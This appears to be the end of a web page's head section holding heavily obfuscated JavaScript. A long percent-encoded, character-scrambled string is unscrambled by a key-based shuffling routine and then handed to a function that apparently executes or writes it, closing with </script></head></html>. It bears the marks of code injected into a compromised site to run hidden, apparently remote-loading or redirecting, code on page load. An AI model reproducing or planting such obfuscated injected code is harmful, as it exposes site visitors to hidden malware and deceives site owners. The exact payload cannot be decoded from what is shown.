5/52%25dxn2middCt23iCiE3teGp=S5pd0avov%25MeCas:%25mve0Ciln22%25/5E2p22ai22%25Set2rnavj2chChc2/ci2g5/M%25h2252%252280sNCbsEgvAti2r5es3gr%25s-ir%25scl32yad%25cle1nEr-%25e.%25a9xdmi2-3t0K5/PtmCicn03t7u3rt5%25055sC%25%255i0nbta2C5%25visvicsiialc-N=sh/3ei5.22eds//esc5e=2E%25S2deRnh&f-Us.a0nie%25:egod5.YE%25-s3P%253vng2adsgntiCt5a3/20tp%25m%25lgfvtvbi2hstrZEvbpy0CrnheCt25Sen2pi22dn/i3cClvbEev5v522sd/h%25h5/2%25r3CUB%25E30-3n50ac5=%253aad5://3isi2ssg5/5=Pn50b5egtsr5t0v2=v95msfeG22Cpe=gr0y2015nemg3=3%25%25cpgm2t%25relokrs25ao=h5g%25sC3Ec%25mpo2-s%25Cse=i5s%255eEi3pd2esm3%25%25323hcpe22xi2smdN%25n3e%253/.w%25ta-ix2.3iap%25r2/d/c.%25loEmr%25/=2=a2s.&roEitd5icvdhss2m52/Chae50ED%2552um3%25r2l2si7e2532v2%25s3t5maol20i-boE2t2ii0ha%2505m2i%25:.a2rgtc2vi/.05C3/cp%25-odp52%255rtervnsvsi3E/.lr0%25%25%25yC%25svb=35553%25C9:3Ee52.ggnsgp3=522t2agvs%25i/sl23a1S2m%2505a/c30E%255v22sp0ag%25llld%252t5e5s251tac2t%25%25liei50pt2tBviyc%252cc50ldu=2gai2p/mecC25:h20aC%252/%25nt2a?tCEnd2t3x%255a9fi22i2f33vwcmgmsp/las5/dvtgiE5mtE.33r%25--e%25ee2s2cs5s.g0Ei%255cso2Ali2gs2-%25s25p35se=%25tk/sTdg155p00e20c=a%25t%25U0:=oQ5mayA-f%25F0hosxEEpK3adTxE80%25n2h2X%255aet225%25.t0ymEv5im-Qi231dt2e29i0xN%25%25%25BesA53v3:v2m-grqovB235e2n2rot2i%253cqnn/eg2mb%25=29/=-iaplir52h=2v%2522Q3jr%25g2m5cbo%25i552/=5Cl2sC5Crded5c2o35%25%2503/l/ona:CTdpEepCtseatsr5Aigve5ncr2sg%255s2o2t%258EXy/sCap2mcnhtC5ge5CSkecstepsa5tv5paNgr%252GC2/sb%25hZ.=X0iQpc=%25c2l02x25s5Beal5/3sccs2n%252222i%2522e:goq3vn=Vo%25Fzst.4?i%252=n1e3v2gd3go%25Tve.ct2E05tt3t3%25%25i20EUcsJy505-staCr%25.5d3q2%25r2%25aIa5vPXeis3u%25d:%25ltlytlpnx:-pvp02i%25etpg%25emiib=gtbae-c%25CiehCG=22a2=2io1vv5d53s32t2tE2tC%25uCs:tluR5nCynt520:5r2spp25eda2eE2rtv1e9CdtsssdC-n322205lc/g2/20%25i550m5s2r5rm40%25hd21h5ge3csEf033is=gtin%25iRe%25esrr%253%25Gtwhln.4p7/2e=gn2Nkhg%2525E?k0t2et5pt%25kh%25nF2iemoiI2.t%255sm-2ais2-se2vsmEbidzh32Azt/52H5233%25el0tisxdayv%25mmt.l33s/mNpt23s2rA/:cgi5t%251ixe%25cir2rO2v%25=f%25ijaBT//N3Bts0ga.ahD.t/isrg%25c:dj2E%25i-%25an2cg0mO/vs32qEm5ckbo=n2552Cn2t=%259r2g:2b227ad0eb225otnXQcc0Shyg:E5o2at322baSctp5o.39f552t//220m-ev0v5Cg%253sgEt5eeaM/.5GseAib/-8i34/Tdgge%25G2%255=%25cl2%25%25v2vs22XZ31mmm3a3o32rpB-25cnanp3%25cUmpC52v5/3%25sCscit2%25%25tE2%25sEdry-/ce./Kse2/t2tt%25cad/Ca3%25:2rxstGgp%25lah/dd%25i2Q50alebH233c&0hc2u533E5l22525=iCimvtaitg2552%25f2CM5svs5c52%255iEv/3ss.2s:E=ntpacCs%25i05t33i5Cni=9ssaiC/a0lv5i0%25tlaBE25=2tv/v5zarv0f25%253vl=i%2520%25c22%25i55/%250i=5535p%25iec2tccnvn21-3kd/2%25%25RdeSs-Sy=emhCEpsS0ienii/%25e3sac302.-t/s322=n-Cssa2sc0CaC3.h5xc/%25t5/5i352tgat55/255t%25e%25he25:E-eE5vlIiv5p%253r.i%25%252Ts5m/tE2225mc0Comfb22E%252%252Es232e2.05gj2lCr=%25ne%25%25tca%25s%25s0s53q355:t3%25g%25E52ia3av%25p93r32d32s33vh=o%252g2j%25icy3t3v225peto022%25nm25%25%25/cp3i55liv/.rS2vidigC/3c9C%250ra=i%25C5.2h%25s5vhdgal%252dCChldt0rtgh5/35y2ggse3=rn3Casd%255p03oi5h2v5tc%25a6i2/e3eEmhtsdC2E0=g-cvsi3nne/sx532gs=a25s2dmC:%25%25iphdm2t5ia%25reYiv/53=./pcmSCEg5%25igg0v%252i%252E%25b%25e.s=2ar%25i23tie3iit=denv::2532//vl5cs232b=so2.5sjE%25lCe59at-/2c1sEr5sm3cev/25sl%252vK252a.52C%25e022d2E2%25e0e2%2555smg%25Ebe2%25.cs2taa2h5vrn/rw-t%25id5vi3sy2%25hdsg/i4f503t2vabcmvcil=.5Ctns/%25cGR2ci::t0252jr=%25g=%25ad%2532cssEE/ccde%25020ss35ms3naav0etr%25Rr=2ip4ti%2529%25c/2e5l5/5vp0iCv-Cl25vptlivjE-S=pxddgpca0a%253223t3d5C0CEigi=5d0rcdtc%254l3c5ctc5s%25sa.ieo2vrtc/25n2%25g%255gs/%25ati%25%25s2/C.22h%25sC23sCSg5E%25222i%25%254.H2%252Cd=nss5=v-dmm05ehia5isgerrpl%25so0h%25r-h%25b%252c-20523t0xv5de5gv2s.c255=-iggp2ecpE%253e5E2350s%25p-E%25isa=p/3fEs3a2ivcms22p2siiee%253/hlrse=5=%2533oc/s-B2i5iz3c52id%25s2%25t:%25m0=msSl/ng2ELvp3.23y5/029n=2lv5ii/g/i5t2r53pb5s02ar2hrc0hv5%25Ytvrs0l:a25CS.g25337a%25ls00iss2C:t2d2Siv1-E3m%253ra%25252c5.52exiasp3%25//E5sp5sSh2ini=5rE%25d5%253/2t0/5te..9.2s2/rb3hcCaamaEEs2/3maciCaer0ihei3Ep/s-%25vi-%25-5ic%25%25cy.t%25teEjhvaig0acgi2t5/sve5q08b%252522%25s2i5efchnE2Ev3iiddgspg%25d02victgs54tea:=X2r/2n%25%25/s8533Cmsd%25vtnvC=n2pt.Ervv5b3b022%25lE3/s2C5322a2%25%25=Cecast2s5stlien5dC5215522sx2%255C2tCil1s2y3Cg.30par.ep2edcsinaa0hret2v5eF0223aa%25ea0n5/230hem3mpo533CsN5%25-es%25%25e2tsCsli%25isf3oaisE=%255cv3a55s52/%2559/e:2cnecr2re%25/a%25nv%255dnmsiliaEcE2tnCtt2cV:%255Ch:v523oc20%253n22m2shp:=v-3d32s/b2m%253%259:/5a%25ianEs2E32p5%25g%25=22i9a=/t55252e-2t2d%255xe%25%252jps-g=/l2eim3cC3h5s3/5=2i%25Ert3egCgt5-rv2d%25tvvl2l3%25Eti50t.ce5do:2%259leEh.%252og/2%250Ce5t732eyl53eec0c:iditd23s5rehpv/edlp%25m5e/i.%25n5v-Zv255dcvastC/ne/cs:em%2552einregdev2E55s5-50/%252s%25acsie0r3brd2/.ntVm.gCCvdai5E.to=a.Ceg/2m//gs53Cl.%25t:Ei5s2C0ldpit%25nt2es20E3cv39%25n5%25253r2%25%25n22%25t:5c3/25e2E%2530%2502t0as2i-Qti222-a%25.en5meivs0cg3=a3%25p3ogl520%25sCh%25t=225EEaX2.%25%25=ic/v2ivv0t%255%252355d%25l.cvvgEvdce3sve%25k--/vfC23D2/5l%25Cail%25igErri-.e%252eleCC5335/2/vsh%25e%255p523hE3-ayio2id1=t=h2o2cmtsl:b-si.a5%25a=hCiiaeemgtsehnvn5-mC2hvgmil02.iEdm3apa/v5n=t.m52%253e5i:l-5vi%25d2e%25crC5/C%2555slnmC0%25%252ii%25-/tt52=2cdfbnE2gaa30t25mEhQmDrpal%250C2g%252vlE20bi%25i3rirtsvErM22dc/el/32vec/sn2a2cEsvisCECEv3Ca0%255rCpi2./plCtv2id%25c2ecde2%250-3sttoEep3E%25ag05ha%25e5%25icv3v3xYhCv2n0ed2ssivp/5mt20l3e2%2543r/e5ehaiia%25i2gn0=e/Kac55vln32%25%25vtxl%25cr2tme8r522e5:eersfClan05Cg2E23%2525Egmp55%25g2g%255be2mvlE22/Ec5-5sr22-2%255drp3a32/25a/502a25.%25a3g:oE2sec5pn-i2v5g%25ichignE5l20=23n5ipee=:een%25ra=is9v9lg5ac:%2522a03n/e03=5l%2530imc252Hi0%25n%2523v.%250t.C4g%252p5-mpt0%25e5b2sn32n5v%25s=nxii5%2502i05-Yho.%25l2%25t3ldsoiCC50es2i2h%252c3ss%25c22%25tsvse2ycCC4/he02t52v==2%25v53h%25-2552j5tsC/%25tg/%255hnhl35psl2aC9ie%25ir=y05%251/%25h2%25vnhCne5ee32ci5d5rteg3t=25p3erc2sEea%25cttlCit.v2v%25d-a252s53h312caCv2eE2l53/2%25sde0izi05iBg20232l5tv5d0=ziC%25y%25/=.is2W0%25-id/c2/5avae%25.Qiv2:iEdah%2510bza/mrC5ar=gE2aehev33d3%25pp3Ns5v2a2se:Ce3p%25%25sc2/n2C5ch3%25dsitl%253ndg%25n%25zn32s5c2h:205vm221VtdCs355=eE3b3l/%252C2Egr%25r32t=r23028%25E3t0-5:2=2r.a%25i0n%25g2aEsivEh22x5/.vodEbsCr%25g5/i535e32n%252a-//22%25lvia%25vetmv2ii%25nts=v/0%25c2m5t=e%25:s5%25/2p%25n5hp3egtoao.5/hl5d20pCz:3lra%25f/ct2a3ce%25=aii5lgas%255m1s-=c5deiegtC9CchEn2y.5d2vi=e5vnlb23z225bcC=av5/w%25e2%25/vCEti./Etl%25utCt-hE5se%25(2iattgaszmspafp-0C/eg2%25EscdcEC3ls5m2-2s.5d2%25t%25)5ca=l5nvi13l522+5)egsg2;Psnra%2535%252esmtl3s,pnandig5d/g/t5rgas3%25Cs./eptnx&i.-51Co-,gvgCb3.B05dtln=lei%25mkE2=21=nhg&%25l%252325e.ne2%25=e%25(-s=l5Dnl)5i.lt,2c%25gC5e%25mv%255+t3=37r-r%25lc-3cCEgl.5,n))ki(tk%255kipy.h=2jD=n(n3g%255=%25+gt0k(:%25,75Cn3%25D2;;hDib%2525v(,d3nmr0/lBCn2%25(txt%25fv%255%25lhlt%25.raoa/=p2E%25=)2e%25e%25fr3g2%2559kt,+%25;,;Dp2e)lk2tvhfE5sB5Ahn%25uctDh-=E0%25=-%22v%25ck)h5)0%22l=ll3Blsn%25ks5.=%25i=g%25t-.=Pk3%3EE=h2t,g.g=l=lg2%253;(i-t,gtj1kgsafgsD-gj1e1D-k)gk%5Bbl%5Dkh3,)cv%3E)71nn=%22=5s%5D=t.h.c=,gjnne%7C+,Bg=)tk;t=(=,f%5Di-f/%22i,+l))jlle0()rihmj+=lr%5Bgn%5D;)l=egljlt-%3Ct.%22t2=%5B&b&i(nnf%5B%7D=%5D;,e+-l%5Blb,;fo(%252=f,lll(,li%7C;-%3Ck.n5Dghh;(-=)iB.kel%5D;Y%25,)%5B)(otischkpf%3E")).split(""),g=k.length%j.length,l=k.length-1;l>=0;l--)g--,-1==g&&(g=j.length-1),f=l+j[g],f>=k.length||(c=k[l],b=k[f],k[f]=c,k[l]=b);for(n=m,i="",l=0;l<k.length;l++)i+=k[l];n(i)})();

</script>
</head>
</html>




